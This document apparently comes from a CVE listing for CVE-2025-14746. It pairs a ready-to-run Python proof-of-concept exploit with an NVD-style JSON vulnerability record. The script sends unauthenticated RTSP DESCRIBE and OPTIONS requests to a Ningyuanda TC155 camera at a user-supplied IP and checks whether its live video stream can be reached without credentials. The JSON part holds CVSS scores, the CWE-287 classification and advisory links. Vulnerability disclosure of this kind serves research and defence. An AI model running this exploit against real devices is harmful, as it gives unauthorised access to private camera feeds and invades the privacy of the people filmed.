CVE-2025-14746

#!/usr/bin/env python3 # CVE-2025-14746 PoC - Ningyuanda TC155 RTSP Authentication Bypass # Affected Product: Ningyuanda TC155 (firmware < 57.0.2.0) # Attack Vector: Adjacent Network (AV:A) # Authentication Required: None (PR:N) import socket import sys def send_rtsp_request(host, port, request): """ Send RTSP request and receive response """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((host, port)) # Send RTSP request sock.send(request.encode('utf-8')) # Receive response response = b'' while True: try: chunk = sock.recv(4096) if not chunk: break response += chunk # Check if response is complete if b'\r\n\r\n' in response: break except socket.timeout: break sock.close() return response.decode('utf-8', errors='ignore') except Exception as e: return f"Error: {str(e)}" def exploit_rtsp_bypass(target_ip, rtsp_port=554): """ Exploit CVE-2025-14746: RTSP Authentication Bypass This PoC demonstrates unauthorized access to RTSP video stream """ print(f"[*] Target: {target_ip}:{rtsp_port}") print(f"[*] Testing CVE-2025-14746: RTSP Authentication Bypass") # Method 1: DESCRIBE request without authentication describe_request = ( f"DESCRIBE rtsp://{target_ip}/stream1 RTSP/1.0\r\n" f"CSeq: 1\r\n" f"Accept: application/sdp\r\n" f"\r\n" ) print("\n[1] Sending DESCRIBE request without authentication...") response = send_rtsp_request(target_ip, rtsp_port, describe_request) if '200 OK' in response and 'DESCRIBE' in response: print("[+] VULNERABLE: DESCRIBE request succeeded without authentication") print("\n[+] RTSP Response:") print(response[:1000] if len(response) > 1000 else response) # Extract SDP information if 'v=' in response: print("\n[+] Video stream information obtained:") print(" The attacker can now access live video feed without credentials") else: print("[-] DESCRIBE request failed or requires authentication") # Method 2: OPTIONS request without authentication options_request = ( f"OPTIONS rtsp://{target_ip}/stream1 RTSP/1.0\r\n" f"CSeq: 2\r\n" f"\r\n" ) print("\n[2] Sending OPTIONS request without authentication...") response2 = send_rtsp_request(target_ip, rtsp_port, options_request) if '200 OK' in response2: print("[+] OPTIONS request succeeded") if 'Public:' in response2: print("[+] Available methods:", end=" ") for line in response2.split('\r\n'): if 'Public:' in line: print(line.split('Public:')[1].strip()) return True if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [rtsp_port]") print(f"Example: {sys.argv[0]} 192.168.1.100 554") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 554 exploit_rtsp_bypass(target, port)

{"cve": {"id": "CVE-2025-14746", "sourceIdentifier": "[email protected]", "published": "2025-12-16T03:15:57.233", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Ningyuanda TC155 57.0.2.0. The affected element is an unknown function of the component RTSP Live Video Stream Endpoint. Such manipulation leads to improper authentication. The attack must be carried out from within the local network. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 3.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 6.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:shenzhenningyuandatechnology:tc155_firmware:57.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC8CEF63-8B37-4D17-8C31-4BD41E7B8D5B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:shenzhenningyuandatechnology:tc155:-:*:*:*:*:*:*:*", "matchCriteriaId": "0DC27CA3-9706-448B-8C91-E413B1F05656"}]}]}], "references": [{"url": "https://github.com/pwnpwnpur1n/IoT-advisories/blob/main/TC155-Unauth-RTSP.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.336519", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336519", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707195", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}